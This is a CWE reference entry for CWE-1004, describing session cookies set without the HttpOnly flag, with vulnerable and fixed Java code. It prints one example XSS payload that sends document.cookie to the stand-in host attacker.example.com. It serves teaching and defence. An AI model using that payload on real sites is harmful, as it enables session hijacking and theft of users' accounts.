CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag

Description

The product uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.

Submission Date :

Jan. 2, 2017, midnight

Modification Date :

2023-10-26 00:00:00+00:00

Organization :

MITRE
Extended Description

The HttpOnly flag directs compatible browsers to prevent client-side script from accessing cookies. Including the HttpOnly flag in the Set-Cookie HTTP response header helps mitigate the risk associated with Cross-Site Scripting (XSS) where an attacker's script code might attempt to read the contents of a cookie and exfiltrate information obtained. When set, browsers that support the flag will not reveal the contents of the cookie to a third party via client-side script executed via XSS.

Example Vulnerable Codes

Example - 1

In this example, a cookie is used to store a session ID for a client's interaction with a website. The intention is that the cookie will be sent to the website with each request made by the client.

The snippet of code below establishes a new cookie to hold the sessionID.


String sessionID = generateSessionId();Cookie c = new Cookie("session_id", sessionID);response.addCookie(c);

The HttpOnly flag is not set for the cookie. An attacker who can perform XSS could insert malicious script such as:

document.write('<img src="http://attacker.example.com/collect-cookies?cookie=' + document.cookie . '">'

When the client loads and executes this script, it makes a request to the attacker-controlled web site. The attacker can then log the request and steal the cookie.

To mitigate the risk, use the setHttpOnly(true) method.


String sessionID = generateSessionId();Cookie c = new Cookie("session_id", sessionID);c.setHttpOnly(true);response.addCookie(c);

Related Weaknesses

This table shows the weaknesses and high level categories that are related to this weakness. These relationships are defined to give an overview of the different insight to similar items that may exist at higher and lower levels of abstraction.

CWE-732: Incorrect Permission Assignment for Critical Resource
Go to

Visit http://cwe.mitre.org/ for more details.